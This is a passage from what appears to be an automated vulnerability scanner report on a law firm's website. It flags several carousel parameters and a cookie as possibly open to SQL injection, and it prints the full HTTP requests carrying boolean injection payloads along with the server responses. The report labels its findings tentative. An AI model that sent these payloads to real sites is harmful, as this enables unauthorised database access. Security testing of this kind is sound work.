<script language="javascript" type="text/javascript" src="scripts/jquery.js"></script>
<script language="javascript" type="text/javascript" src="scripts/jquery.dimensions.js"></script>
<script language="javascript" type="text/javascript" src="/scripts/carousel/carousel_behavior_min.js"></script>
<script language="javascript" type="text/javascript" src="scripts/nyroModal/nyroModal.js"></script>

<link rel="stylesheet" href="scripts/nyroModal/nyroModal.css" type="text/css" media="screen" />
<link rel="stylesheet" href="scripts/carousel/carousel.css" type="text/css">


<script type="text/javascript">
<!--//
function checkSearchFormKeyword(){
    if((document.forms["sitesearch"].keyword.value.length == 0)||(document.forms["sitesearch"].keyword.value == "Enter Keyword")){
       alert('Please enter a keyword for your search.');
       document.forms["sitesearch"].keyword.focus();
       return false;
       }
   }
function checkSearchFormAttorney(){
    if((document.form
...[SNIP]...

Request 2

POST /scripts/carousel/getimages.cfm HTTP/1.1
Host: www.curtis.com
Proxy-Connection: keep-alive
Referer: http://www.curtis.com/
Origin: http://www.curtis.com
X-Requested-With: XMLHttpRequest
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.204 Safari/534.16
Content-Type: application/x-www-form-urlencoded
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: CFID=6175843; CFTOKEN=32575697; sifrFetch=true
Content-Length: 237

first_last_buttons=no&first_slide_is_intro=no&hover_next_prev_buttons=no&next_prev_buttons=no&pause_button=no&slide_buttons=no&slide_captions=no&slide_directory=slides&doctype=html&slide_links=no&slide_number_display=no&water_mark=no&112395009%20or%201%3d2--%20=1

Response 2

HTTP/1.1 200 OK
Connection: close
Date: Thu, 21 Apr 2011 12:09:31 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Set-Cookie: CFID=6175843;path=/
Set-Cookie: CFTOKEN=32575697;path=/
Content-Type: text/html; charset=UTF-8


<div id='slide_holder_inner'>

<div id='row_of_slides'>
<div class='slide' id='slide_1'><img src='/images/hprotation/hp_ny.jpg'></div>
<div class='slide' id='slide_2'><img src='/images/hprotation/hp_houston.jpg'></div>
<div class='slide' id='slide_3'><img src='/images/hprotation/hp_stamford.jpg'></div>
<div class='slide' id='slide_4'><img src='/images/hprotation/hp_dc.jpg'></div>
<div class='slide' id='slide_5'><img src='/images/hprotation/hp_almaty.jpg'></div>
<div class='slide' id='slide_6'><img src='/images/hprotation/hp_astana.jpg'></div>
<div class='slide' id='slide_7'><img src='/images/hprotation/hp_dubai.jpg'></div>
<div class='slide' id='slide_8'><img src='/images/hprotation/hp_frankfurt.jpg'></div>
<div class='slide' id='slide_9'><img src='/images/hprotation/hp_istanbul.jpg'></div>
<div class='slide' id='slide_10'><img src='/images/hprotation/hp_london.jpg'></div>
<div class='slide' id='slide_11'><img src='/images/hprotation/hp_mexicocity.jpg'></div>
<div class='slide' id='slide_12'><img src='/images/hprotation/hp_milan.jpg'></div>
<div class='slide' id='slide_13'><img src='/images/hprotation/hp_muscat.jpg'></div>
<div class='slide' id='slide_14'><img src='/images/hprotation/hp_france.jpg'></div>
</div>

</div>

1.42. http://www.curtis.com/scripts/carousel/getimages.cfm [next_prev_buttons parameter]

Summary

Severity:   High
Confidence:   Tentative
Host:   http://www.curtis.com
Path:   /scripts/carousel/getimages.cfm

Issue detail

The next_prev_buttons parameter appears to be vulnerable to SQL injection attacks. The payloads 15232388'%20or%201%3d1--%20 and 15232388'%20or%201%3d2--%20 were each submitted in the next_prev_buttons parameter. These two requests resulted in different responses, indicating that the input is being incorporated into a SQL query in an unsafe way.

Note that automated difference-based tests for SQL injection flaws can often be unreliable and are prone to false positive results. You should manually review the reported requests and responses to confirm whether a vulnerability is actually present.

Request 1

POST /scripts/carousel/getimages.cfm HTTP/1.1
Host: www.curtis.com
Proxy-Connection: keep-alive
Referer: http://www.curtis.com/
Origin: http://www.curtis.com
X-Requested-With: XMLHttpRequest
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.204 Safari/534.16
Content-Type: application/x-www-form-urlencoded
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: CFID=6175843; CFTOKEN=32575697; sifrFetch=true
Content-Length: 233

first_last_buttons=no&first_slide_is_intro=no&hover_next_prev_buttons=no&next_prev_buttons=no15232388'%20or%201%3d1--%20&pause_button=no&slide_buttons=no&slide_captions=no&slide_directory=slides&doctype=html&slide_links=no&slide_number_display=no&water_mark=no

Response 1 (redirected)

HTTP/1.1 200 OK
Connection: close
Date: Thu, 21 Apr 2011 12:08:34 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Set-Cookie: CFID=6175843;path=/
Set-Cookie: CFTOKEN=32575697;path=/
Content-Type: text/html; charset=UTF-8


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1" />

<link rel="stylesheet" href="scripts/general.css" type="text/css" media="all" />
<link rel="stylesheet" href="scripts/menu.css" type="text/css" media="all" />
<link rel="stylesheet" href="/sifr3/sifr3.css" type="text/css"/>
<link href="/rss.cfm?feedID=1" rel="alternate" type="application/rss+xml" title="News" />
<link href="/rss.cfm?feedID=2" rel="alternate" type="application/rss+xml" title="Events" />
<link href="/rss.cfm?feedID=3" rel="alternate" type="application/rss+xml" title="Publications" />
<script language="javascript" type="text/javascript" src="/scripts/global.js"></script>
<script language="javascript" type="text/javascript" src="/sifr3/sifr3.js"></script>
<script src="scripts/AC_RunActiveContent.js" type="text/javascript"></script>
<script language="javascript" type="text/javascript" src="scripts/jquery.js"></script>
<script language="javascript" type="text/javascript" src="scripts/jquery.dimensions.js"></script>
<script language="javascript" type="text/javascript" src="/scripts/carousel/carousel_behavior_min.js"></script>
<script language="javascript" type="text/javascript" src="scripts/nyroModal/nyroModal.js"></script>

<link rel="stylesheet" href="scripts/nyroModal/nyroModal.css" type="text/css" media="screen" />
<link rel="stylesheet" href="scripts/carousel/carousel.css" type="text/css">


<script type="text/javascript">
<!--//
function checkSearchFormKeyword(){
    if((document.forms["sitesearch"].keyword.value.length == 0)||(document.forms["sitesearch"].keyword.value == "Enter Keyword")){
       alert('Please enter a keyword for your search.');
       document.forms["sitesearch"].keyword.focus();
       return false;
       }
   }
function checkSearchFormAttorney(){
    if((document.form
...[SNIP]...

Request 2

POST /scripts/carousel/getimages.cfm HTTP/1.1
Host: www.curtis.com
Proxy-Connection: keep-alive
Referer: http://www.curtis.com/
Origin: http://www.curtis.com
X-Requested-With: XMLHttpRequest
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.204 Safari/534.16
Content-Type: application/x-www-form-urlencoded
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: CFID=6175843; CFTOKEN=32575697; sifrFetch=true
Content-Length: 233

first_last_buttons=no&first_slide_is_intro=no&hover_next_prev_buttons=no&next_prev_buttons=no15232388'%20or%201%3d2--%20&pause_button=no&slide_buttons=no&slide_captions=no&slide_directory=slides&doctype=html&slide_links=no&slide_number_display=no&water_mark=no

Response 2

HTTP/1.1 200 OK
Connection: close
Date: Thu, 21 Apr 2011 12:08:35 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Set-Cookie: CFID=6175843;path=/
Set-Cookie: CFTOKEN=32575697;path=/
Content-Type: text/html; charset=UTF-8


<div id='slide_holder_inner'>

<div id='row_of_slides'>
<div class='slide' id='slide_1'><img src='/images/hprotation/hp_ny.jpg'></div>
<div class='slide' id='slide_2'><img src='/images/hprotation/hp_houston.jpg'></div>
<div class='slide' id='slide_3'><img src='/images/hprotation/hp_stamford.jpg'></div>
<div class='slide' id='slide_4'><img src='/images/hprotation/hp_dc.jpg'></div>
<div class='slide' id='slide_5'><img src='/images/hprotation/hp_almaty.jpg'></div>
<div class='slide' id='slide_6'><img src='/images/hprotation/hp_astana.jpg'></div>
<div class='slide' id='slide_7'><img src='/images/hprotation/hp_dubai.jpg'></div>
<div class='slide' id='slide_8'><img src='/images/hprotation/hp_frankfurt.jpg'></div>
<div class='slide' id='slide_9'><img src='/images/hprotation/hp_istanbul.jpg'></div>
<div class='slide' id='slide_10'><img src='/images/hprotation/hp_london.jpg'></div>
<div class='slide' id='slide_11'><img src='/images/hprotation/hp_mexicocity.jpg'></div>
<div class='slide' id='slide_12'><img src='/images/hprotation/hp_milan.jpg'></div>
<div class='slide' id='slide_13'><img src='/images/hprotation/hp_muscat.jpg'></div>
<div class='slide' id='slide_14'><img src='/images/hprotation/hp_france.jpg'></div>
</div>

</div>

1.43. http://www.curtis.com/scripts/carousel/getimages.cfm [pause_button parameter]

Summary

Severity:   High
Confidence:   Tentative
Host:   http://www.curtis.com
Path:   /scripts/carousel/getimages.cfm

Issue detail

The pause_button parameter appears to be vulnerable to SQL injection attacks. The payloads 17457857'%20or%201%3d1--%20 and 17457857'%20or%201%3d2--%20 were each submitted in the pause_button parameter. These two requests resulted in different responses, indicating that the input is being incorporated into a SQL query in an unsafe way.

Note that automated difference-based tests for SQL injection flaws can often be unreliable and are prone to false positive results. You should manually review the reported requests and responses to confirm whether a vulnerability is actually present.

Request 1

POST /scripts/carousel/getimages.cfm HTTP/1.1
Host: www.curtis.com
Proxy-Connection: keep-alive
Referer: http://www.curtis.com/
Origin: http://www.curtis.com
X-Requested-With: XMLHttpRequest
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.204 Safari/534.16
Content-Type: application/x-www-form-urlencoded
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: CFID=6175843; CFTOKEN=32575697; sifrFetch=true
Content-Length: 233

first_last_buttons=no&first_slide_is_intro=no&hover_next_prev_buttons=no&next_prev_buttons=no&pause_button=no17457857'%20or%201%3d1--%20&slide_buttons=no&slide_captions=no&slide_directory=slides&doctype=html&slide_links=no&slide_number_display=no&water_mark=no

Response 1 (redirected)

HTTP/1.1 200 OK
Connection: close
Date: Thu, 21 Apr 2011 12:08:38 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Set-Cookie: CFID=6175843;path=/
Set-Cookie: CFTOKEN=32575697;path=/
Content-Type: text/html; charset=UTF-8


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1" />

<link rel="stylesheet" href="scripts/general.css" type="text/css" media="all" />
<link rel="stylesheet" href="scripts/menu.css" type="text/css" media="all" />
<link rel="stylesheet" href="/sifr3/sifr3.css" type="text/css"/>
<link href="/rss.cfm?feedID=1" rel="alternate" type="application/rss+xml" title="News" />
<link href="/rss.cfm?feedID=2" rel="alternate" type="application/rss+xml" title="Events" />
<link href="/rss.cfm?feedID=3" rel="alternate" type="application/rss+xml" title="Publications" />
<script language="javascript" type="text/javascript" src="/scripts/global.js"></script>
<script language="javascript" type="text/javascript" src="/sifr3/sifr3.js"></script>
<script src="scripts/AC_RunActiveContent.js" type="text/javascript"></script>
<script language="javascript" type="text/javascript" src="scripts/jquery.js"></script>
<script language="javascript" type="text/javascript" src="scripts/jquery.dimensions.js"></script>
<script language="javascript" type="text/javascript" src="/scripts/carousel/carousel_behavior_min.js"></script>
<script language="javascript" type="text/javascript" src="scripts/nyroModal/nyroModal.js"></script>

<link rel="stylesheet" href="scripts/nyroModal/nyroModal.css" type="text/css" media="screen" />
<link rel="stylesheet" href="scripts/carousel/carousel.css" type="text/css">


<script type="text/javascript">
<!--//
function checkSearchFormKeyword(){
    if((document.forms["sitesearch"].keyword.value.length == 0)||(document.forms["sitesearch"].keyword.value == "Enter Keyword")){
       alert('Please enter a keyword for your search.');
       document.forms["sitesearch"].keyword.focus();
       return false;
       }
   }
function checkSearchFormAttorney(){
    if((document.form
...[SNIP]...

Request 2

POST /scripts/carousel/getimages.cfm HTTP/1.1
Host: www.curtis.com
Proxy-Connection: keep-alive
Referer: http://www.curtis.com/
Origin: http://www.curtis.com
X-Requested-With: XMLHttpRequest
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.204 Safari/534.16
Content-Type: application/x-www-form-urlencoded
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: CFID=6175843; CFTOKEN=32575697; sifrFetch=true
Content-Length: 233

first_last_buttons=no&first_slide_is_intro=no&hover_next_prev_buttons=no&next_prev_buttons=no&pause_button=no17457857'%20or%201%3d2--%20&slide_buttons=no&slide_captions=no&slide_directory=slides&doctype=html&slide_links=no&slide_number_display=no&water_mark=no

Response 2

HTTP/1.1 200 OK
Connection: close
Date: Thu, 21 Apr 2011 12:08:38 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Set-Cookie: CFID=6175843;path=/
Set-Cookie: CFTOKEN=32575697;path=/
Content-Type: text/html; charset=UTF-8


<div id='slide_holder_inner'>

<div id='row_of_slides'>
<div class='slide' id='slide_1'><img src='/images/hprotation/hp_ny.jpg'></div>
<div class='slide' id='slide_2'><img src='/images/hprotation/hp_houston.jpg'></div>
<div class='slide' id='slide_3'><img src='/images/hprotation/hp_stamford.jpg'></div>
<div class='slide' id='slide_4'><img src='/images/hprotation/hp_dc.jpg'></div>
<div class='slide' id='slide_5'><img src='/images/hprotation/hp_almaty.jpg'></div>
<div class='slide' id='slide_6'><img src='/images/hprotation/hp_astana.jpg'></div>
<div class='slide' id='slide_7'><img src='/images/hprotation/hp_dubai.jpg'></div>
<div class='slide' id='slide_8'><img src='/images/hprotation/hp_frankfurt.jpg'></div>
<div class='slide' id='slide_9'><img src='/images/hprotation/hp_istanbul.jpg'></div>
<div class='slide' id='slide_10'><img src='/images/hprotation/hp_london.jpg'></div>
<div class='slide' id='slide_11'><img src='/images/hprotation/hp_mexicocity.jpg'></div>
<div class='slide' id='slide_12'><img src='/images/hprotation/hp_milan.jpg'></div>
<div class='slide' id='slide_13'><img src='/images/hprotation/hp_muscat.jpg'></div>
<div class='slide' id='slide_14'><img src='/images/hprotation/hp_france.jpg'></div>
</div>

</div>

1.44. http://www.curtis.com/scripts/carousel/getimages.cfm [sifrFetch cookie]

Summary

Severity:   High
Confidence:   Tentative
Host:   http://www.curtis.com
Path:   /scripts/carousel/getimages.cfm

Issue detail

The sifrFetch cookie appears to be vulnerable to SQL injection attacks. The payloads 87614863'%20or%201%3d1--%20 and 87614863'%20or%201%3d2--%20 were each submitted in the sifrFetch cookie. These two requests resulted in different responses, indicating that the input is being incorporated into a SQL query in an unsafe way.

Note that automated difference-based tests for SQL injection flaws can often be unreliable and are prone to false positive results. You should manually review the reported requests and responses to confirm whether a vulnerability is actually present.

Request 1

POST /scripts/carousel/getimages.cfm HTTP/1.1
Host: www.curtis.com
Proxy-Connection: keep-alive
Referer: http://www.curtis.com/
Origin: http://www.curtis.com
X-Requested-With: XMLHttpRequest
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.204 Safari/534.16
Content-Type: application/x-www-form-urlencoded
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: CFID=6175843; CFTOKEN=32575697; sifrFetch=true87614863'%20or%201%3d1--%20
Content-Length: 233

first_last_buttons=no&first_slide_is_intro=no&hover_next_prev_buttons=no&next_prev_buttons=no&pause_button=no&slide_buttons=no&slide_captions=no&slide_directory=slides&doctype=html&slide_links=no&slid
...[SNIP]...

Response 1 (redirected)

HTTP/1.1 302 Moved Temporarily
Connection: close
Date: Thu, 21 Apr 2011 12:09:25 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Set-Cookie: SIFRFETCH=;expires=Wed, 21-Apr-2010 12:09:25 GMT;path=/
location: /
Content-Type: text/html; charset=UTF-8

Request 2

POST /scripts/carousel/getimages.cfm HTTP/1.1
Host: www.curtis.com
Proxy-Connection: keep-alive
Referer: http://www.curtis.com/
Origin: http://www.curtis.com
X-Requested-With: XMLHttpRequest
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.204 Safari/534.16
Content-Type: application/x-www-form-urlencoded
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: CFID=6175843; CFTOKEN=32575697; sifrFetch=true87614863'%20or%201%3d2--%20
Content-Length: 233

first_last_buttons=no&first_slide_is_intro=no&hover_next_prev_buttons=no&next_prev_buttons=no&pause_button=no&slide_buttons=no&slide_captions=no&slide_directory=slides&doctype=html&slide_links=no&slid
...[SNIP]...

Response 2

HTTP/1.1 200 OK
Connection: close
Date: Thu, 21 Apr 2011 12:09:25 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Set-Cookie: CFID=6175843;path=/
Set-Cookie: CFTOKEN=32575697;path=/
Content-Type: text/html; charset=UTF-8


<div id='slide_holder_inner'>

<div id='row_of_slides'>
<div class='slide' id='slide_1'><img src='/images/hprotation/hp_ny.jpg'></div>
<div class='slide' id='slide_2'><img src='/images/hprotation/hp_houston.jpg'></div>
<div class='slide' id='slide_3'><img src='/images/hprotation/hp_stamford.jpg'></div>
<div class='slide' id='slide_4'><img src='/images/hprotation/hp_dc.jpg'></div>
<div class='slide' id='slide_5'><img src='/images/hprotation/hp_almaty.jpg'></div>
<div class='slide' id='slide_6'><img src='/images/hprotation/hp_astana.jpg'></div>
<div class='slide' id='slide_7'><img src='/images/hprotation/hp_dubai.jpg'></div>
<div class='slide' id='slide_8'><img src='/images/hprotation/hp_frankfurt.jpg'></div>
<div class='slide' id='slide_9'><img src='/images/hprotation/hp_istanbul.jpg'></div>
<div class='slide' id='slide_10'><img src='/images/hprotation/hp_london.jpg'></div>
<div class='slide' id='slide_11'><img src='/images/hprotation/hp_mexicocity.jpg'></div>
<div class='slide' id='slide_12'><img src='/images/hprotation/hp_milan.jpg'></div>
<div class='slide' id='slide_13'><img src='/images/hprotation/hp_muscat.jpg'></div>
<div class='slide' id='slide_14'><img src='/images/hprotation/hp_france.jpg'></div>
</div>

</div>

1.45. http://www.curtis.com/scripts/carousel/getimages.cfm [slide_buttons parameter]

Summary

Severity:   High
Confidence:   Tentative
Host:   http://www.curtis.com
Path:   /scripts/carousel/getimages.cfm

Issue detail

The slide_buttons parameter appears to be vulnerable to SQL injection attacks. The payloads 11199147'%20or%201%3d1--%20 and 11199147'%20or%201%3d2--%20 were each submitted in the slide_buttons parameter. These two requests resulted in different responses, indicating that the input is being incorporated into a SQL query in an unsafe way.

Note that automated difference-based tests for SQL injection flaws can often be unreliable and are prone to false positive results. You should manually review the reported requests and responses to confirm whether a vulnerability is actually present.

Request 1

POST /scripts/carousel/getimages.cfm HTTP/1.1
Host: www.curtis.com
Proxy-Connection: keep-alive
Referer: http://www.curtis.com/
Origin: http://www.curtis.com
X-Requested-With: XMLHttpRequest
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.204 Safari/534.16
Content-Type: application/x-www-form-urlencoded
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: CFID=6175843; CFTOKEN=32575697; sifrFetch=true
Content-Length: 233

first_last_buttons=no&first_slide_is_intro=no&hover_next_prev_buttons=no&next_prev_buttons=no&pause_button=no&slide_buttons=no11199147'%20or%201%3d1--%20&slide_captions=no&slide_directory=slides&doctype=html&slide_links=no&slide_number_display=no&water_mark=no

Response 1 (redirected)

HTTP/1.1 200 OK
Connection: close
Date: Thu, 21 Apr 2011 12:08:42 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Set-Cookie: CFID=6175843;path=/
Set-Cookie: CFTOKEN=32575697;path=/
Content-Type: text/html; charset=UTF-8


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1" />

<link rel="stylesheet" href="scripts/general.css" type="text/css" media="all" />
<link rel="stylesheet" href="scripts/menu.css" type="text/css" media="all" />
<link rel="stylesheet" href="/sifr3/sifr3.css" type="text/css"/>
<link href="/rss.cfm?feedID=1" rel="alternate" type="application/rss+xml" title="News" />
<link href="/rss.cfm?feedID=2" rel="alternate" type="application/rss+xml" title="Events" />
<link href="/rss.cfm?feedID=3" rel="alternate" type="application/rss+xml" title="Publications" />
<script language="javascript" type="text/javascript" src="/scripts/global.js"></script>
<script language="javascript" type="text/javascript" src="/sifr3/sifr3.js"></script>
<script src="scripts/AC_RunActiveContent.js" type="text/javascript"></script>
<script language="javascript" type="text/javascript" src="scripts/jquery.js"></script>
<script language="javascript" type="text/javascript" src="scripts/jquery.dimensions.js"></script>
<script language="javascript" type="text/javascript" src="/scripts/carousel/carousel_behavior_min.js"></script>
<script language="javascript" type="text/javascript" src="scripts/nyroModal/nyroModal.js"></script>

<link rel="stylesheet" href="scripts/nyroModal/nyroModal.css" type="text/css" media="screen" />
<link rel="stylesheet" href="scripts/carousel/carousel.css" type="text/css">


<script type="text/javascript">
<!--//
function checkSearchFormKeyword(){
    if((document.forms["sitesearch"].keyword.value.length == 0)||(document.forms["sitesearch"].keyword.value == "Enter Keyword")){
       alert('Please enter a keyword for your search.');
       document.forms["sitesearch"].keyword.focus();
       return false;
       }
   }
function checkSearchFormAttorney(){
    if((document.form
...[SNIP]...

Request 2

POST /scripts/carousel/getimages.cfm HTTP/1.1
Host: www.curtis.com
Proxy-Connection: keep-alive
Referer: http://www.curtis.com/
Origin: http://www.curtis.com
X-Requested-With: XMLHttpRequest
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.204 Safari/534.16
Content-Type: application/x-www-form-urlencoded
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: CFID=6175843; CFTOKEN=32575697; sifrFetch=true
Content-Length: 233

first_last_buttons=no&first_slide_is_intro=no&hover_next_prev_buttons=no&next_prev_buttons=no&pause_button=no&slide_buttons=no11199147'%20or%201%3d2--%20&slide_captions=no&slide_directory=slides&doctype=html&slide_links=no&slide_number_display=no&water_mark=no

Response 2

HTTP/1.1 200 OK
Connection: close
Date: Thu, 21 Apr 2011 12:08:42 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Set-Cookie: CFID=6175843;path=/
Set-Cookie: CFTOKEN=32575697;path=/
Content-Type: text/html; charset=UTF-8


<div id='slide_holder_inner'>

<div id='row_of_slides'>
<div class='slide' id='slide_1'><img src='/images/hprotation/hp_ny.jpg'></div>
<div class='slide' id='slide_2'><img src='/images/hprotation/hp_houston.jpg'></div>
<div class='slide' id='slide_3'><img src='/images/hprotation/hp_stamford.jpg'></div>
<div class='slide' id='slide_4'><img src='/images/hprotation/hp_dc.jpg'></div>
<div class='slide' id='slide_5'><img src='/images/hprotation/hp_almaty.jpg'></div>
<div class='slide' id='slide_6'><img src='/images/hprotation/hp_astana.jpg'></div>
<div class='slide' id='slide_7'><img src='/images/hprotation/hp_dubai.jpg'></div>
<div class='slide' id='slide_8'><img src='/images/hprotation/hp_frankfurt.jpg'></div>
<div class='slide' id='slide_9'><img src='/images/hprotation/hp_istanbul.jpg'></div>
<div class='slide' id='slide_10'><img src='/images/hprotation/hp_london.jpg'></div>
<div class='slide' id='slide_11'><img src='/images/hprotation/hp_mexicocity.jpg'></div>
<div class='slide' id='slide_12'><img src='/images/hprotation/hp_milan.jpg'></div>
<div class='slide' id='slide_13'><img src='/images/hprotation/hp_muscat.jpg'></div>
<div class='slide' id='slide_14'><img src='/images/hprotation/hp_france.jpg'></div>
</div>

</div>

1.46. http://www.curtis.com/scripts/carousel/getimages.cfm [slide_captions parameter]

Summary

Severity:   High
Confidence:   Tentative
Host:   http://www.curtis.com
Path:   /scripts/carousel/getimages.cfm

Issue detail

The slide_captions parameter appears to be vulnerable to SQL injection attacks. The payloads 15534429'%20or%201%3d1--%20 and 15534429'%20or%201%3d2--%20 were each submitted in the slide_captions parameter. These two requests resulted in different responses, indicating that the input is being incorporated into a SQL query in an unsafe way.

Note that automated difference-based tests for SQL injection flaws can often be unreliable and are prone to false positive results. You should manually review the reported requests and responses to confirm whether a vulnerability is actually present.

Request 1

POST /scripts/carousel/getimages.cfm HTTP/1.1
Host: www.curtis.com
Proxy-Connection: keep-alive
Referer: http://www.curtis.com/
Origin: http://www.curtis.com
X-Requested-With: XMLHttpRequest
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.204 Safari/534.16
Content-Type: application/x-www-form-urlencoded
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: CFID=6175843; CFTOKEN=32575697; sifrFetch=true
Content-Length: 233

first_last_buttons=no&first_slide_is_intro=no&hover_next_prev_buttons=no&next_prev_buttons=no&pause_button=no&slide_buttons=no&slide_captions=no15534429'%20or%201%3d1--%20&slide_directory=slides&doctype=html&slide_links=no&slide_number_display=no&water_mark=no

Response 1 (redirected)

HTTP/1.1 200 OK
Connection: close
Date: Thu, 21 Apr 2011 12:08:46 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Set-Cookie: CFID=6175843;path=/
Set-Cookie: CFTOKEN=32575697;path=/
Content-Type: text/html; charset=UTF-8


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1" />

<link rel="stylesheet" href="scripts/general.css" type="text/css" media="all" />
<link rel="stylesheet" href="scripts/menu.css" type="text/css" media="all" />
<link rel="stylesheet" href="/sifr3/sifr3.css" type="text/css"/>
<link href="/rss.cfm?feedID=1" rel="alternate" type="application/rss+xml" title="News" />
<link href="/rss.cfm?feedID=2" rel="alternate" type="application/rss+xml" title="Events" />
<link href="/rss.cfm?feedID=3" rel="alternate" type="application/rss+xml" title="Publications" />
<script language="javascript" type="text/javascript" src="/scripts/global.js"></script>
<script language="javascript" type="text/javascript" src="/sifr3/sifr3.js"></script>
<script src="scripts/AC_RunActiveContent.js" type="text/javascript"></script>
<script language="javascript" type="text/javascript" src="scripts/jquery.js"></script>
<script language="javascript" type="text/javascript" src="scripts/jquery.dimensions.js"></script>
<script language="javascript" type="text/javascript" src="/scripts/carousel/carousel_behavior_min.js"></script>
<script language="javascript" type="text/javascript" src="scripts/nyroModal/nyroModal.js"></script>

<link rel="stylesheet" href="scripts/nyroModal/nyroModal.css" type="text/css" media="screen" />
<link rel="stylesheet" href="scripts/carousel/carousel.css" type="text/css">


<script type="text/javascript">
<!--//
function checkSearchFormKeyword(){
    if((document.forms["sitesearch"].keyword.value.length == 0)||(document.forms["sitesearch"].keyword.value == "Enter Keyword")){
       alert('Please enter a keyword for your search.');
       document.forms["sitesearch"].keyword.focus();
       return false;
       }
   }
function checkSearchFormAttorney(){
    if((document.form
...[SNIP]...

Request 2

POST /scripts/carousel/getimages.cfm HTTP/1.1
Host: www.curtis.com
Proxy-Connection: keep-alive
Referer: http://www.curtis.com/
Origin: http://www.curtis.com
X-Requested-With: XMLHttpRequest
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.204 Safari/534.16
Content-Type: application/x-www-form-urlencoded
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: CFID=6175843; CFTOKEN=32575697; sifrFetch=true
Content-Length: 233

first_last_buttons=no&first_slide_is_intro=no&hover_next_prev_buttons=no&next_prev_buttons=no&pause_button=no&slide_buttons=no&slide_captions=no15534429'%20or%201%3d2--%20&slide_directory=slides&doctype=html&slide_links=no&slide_number_display=no&water_mark=no

Response 2

HTTP/1.1 200 OK
Connection: close
Date: Thu, 21 Apr 2011 12:08:46 GMT
